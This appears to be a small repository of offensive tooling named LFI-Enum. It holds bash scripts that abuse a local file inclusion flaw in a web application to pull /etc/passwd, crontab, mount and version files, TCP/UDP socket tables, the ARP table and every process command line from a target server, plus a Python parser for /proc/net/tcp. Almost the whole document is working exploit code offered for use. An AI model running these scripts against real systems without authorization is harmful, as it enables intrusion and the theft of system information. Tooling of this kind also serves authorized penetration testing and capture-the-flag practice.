├── README.md
├── common-files
├── network-info
├── process-info
└── utils
    └── linux_net_tcp.py


/README.md:
--------------------------------------------------------------------------------
 1 | # LFI-Enum
 2 | Scritps to enumerate linux servers via LFI
 3 | 
 4 | # Usage
 5 | `bash script-name http://server.vulnerable.com/download.php?file=`
 6 | 
 7 | # Scripts
 8 | ### process-info
 9 | Collect informations about running process.
10 | 
11 | ### network-info
12 | Collect informations about network such as open ports, ARP table and interfaces.
13 | 
14 | ### common-files
15 | Get the content of common files such as `/etc/passwd`, `/etc/crontab` and others.
16 | 
17 | # Util script
18 |  - `/proc/net/tcp` parser - [linux_net_tcp.py](https://gist.github.com/Reboare/2e0122b993b8557935fd37b27436f8c2)
19 | 


--------------------------------------------------------------------------------
/common-files:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | url="$1"
 4 | files=("/etc/passwd" "/etc/crontab" "/proc/mounts" "/etc/issue" "/proc/version" "/etc/resolv.conf" "/etc/hostname" "/etc/anacrontab")
 5 | for filename in ${files[@]};do
 6 |   echo "----$filename----"
 7 |   curl --silent "$url$filename" 
 8 |   echo
 9 | done
10 | 


--------------------------------------------------------------------------------
/network-info:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | url="$1"
 4 | tempfile="$(mktemp)"
 5 | 
 6 | curl --silent "$url/proc/net/tcp" -o "$tempfile"
 7 | echo "TCP Open Ports"
 8 | python utils/linux_net_tcp.py "$tempfile"
 9 | echo 
10 | 
11 | curl --silent "$url/proc/net/udp" -o "$tempfile"
12 | echo "UDP Open Ports"
13 | python utils/linux_net_tcp.py "$tempfile"
14 | echo
15 | 
16 | echo "ARP Table"
17 | curl --silent "$url/proc/net/arp" 
18 | echo
19 | 
20 | echo "Interfaces"
21 | curl --silent "$url/proc/net/dev"| cut -d ":" -f 1 | tail -n +3 | sort -u | sed -e 's/[ \t]*//'
22 | 
23 | 


--------------------------------------------------------------------------------
/process-info:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | set -eu
 4 | 
 5 | max=20
 6 | url="$1"
 7 | maxpid="$(curl --silent "$url/proc/sys/kernel/pid_max")"
 8 | selfcmdline="$(curl --silent "$url/proc/self/cmdline" | strings | tr '\r\n' ' ')"
 9 | 
10 | function getpid(){
11 |   pid="$1"
12 |   cmdline="$(curl --silent "$url/proc/$pid/cmdline" | strings | tr '\r\n' ' ')"
13 |   if [[ "$cmdline" != "" && "$cmdline" != "$selfcmdline" ]];then
14 |     echo -e "PID: $pid\t$cmdline"
15 |   fi
16 | }
17 | 
18 | for ((pid=1; pid<="$maxpid"; pid++));do
19 |   while [[ $(jobs -l | grep Running | wc -l 2> /dev/null) -gt $max ]];do
20 |     sleep 0.3
21 |   done
22 |   getpid "$pid" &
23 | done
24 | 


--------------------------------------------------------------------------------
/utils/linux_net_tcp.py:
--------------------------------------------------------------------------------
 1 | # -*- coding: utf-8 -*-
 2 | import re
 3 | import sys
 4 | 
 5 | def process_file(procnet):
 6 |     sockets = procnet.split('\n')[1:-1]
 7 |     return [line.strip() for line in sockets]
 8 | 
 9 | def split_every_n(data, n):
10 |     return [data[i:i+n] for i in range(0, len(data), n)]
11 | 
12 | def convert_linux_netaddr(address):
13 | 
14 |     hex_addr, hex_port = address.split(':')
15 | 
16 |     addr_list = split_every_n(hex_addr, 2)
17 |     addr_list.reverse()
18 | 
19 |     addr = ".".join(map(lambda x: str(int(x, 16)), addr_list))
20 |     port = str(int(hex_port, 16))
21 | 
22 |     return "{}:{}".format(addr, port)
23 | 
24 | def format_line(data):
25 |     return (("%(seq)-4s %(uid)5s %(local)25s %(remote)25s %(timeout)8s %(inode)8s" % data) + "\n")
26 | 
27 | with open(sys.argv[1]) as f:
28 |     sockets = process_file(f.read())
29 | 
30 | columns = ("seq", "uid", "inode", "local", "remote", "timeout")
31 | title = dict()
32 | for c in columns:
33 |     title[c] = c
34 | 
35 | rv = []
36 | for info in sockets:
37 |     _ = re.split(r'\s+', info)
38 | 
39 |     _tmp = {
40 |         'seq': _[0],
41 |         'local': convert_linux_netaddr(_[1]),
42 |         'remote': convert_linux_netaddr(_[2]),
43 |         'uid': _[7],
44 |         'timeout': _[8],
45 |         'inode': _[9],
46 |     }
47 |     rv.append(_tmp)
48 | 
49 | if len(rv) > 0:
50 |     sys.stderr.write(format_line(title))
51 | 
52 |     for _ in rv:
53 |         sys.stdout.write(format_line(_))
54 | 


--------------------------------------------------------------------------------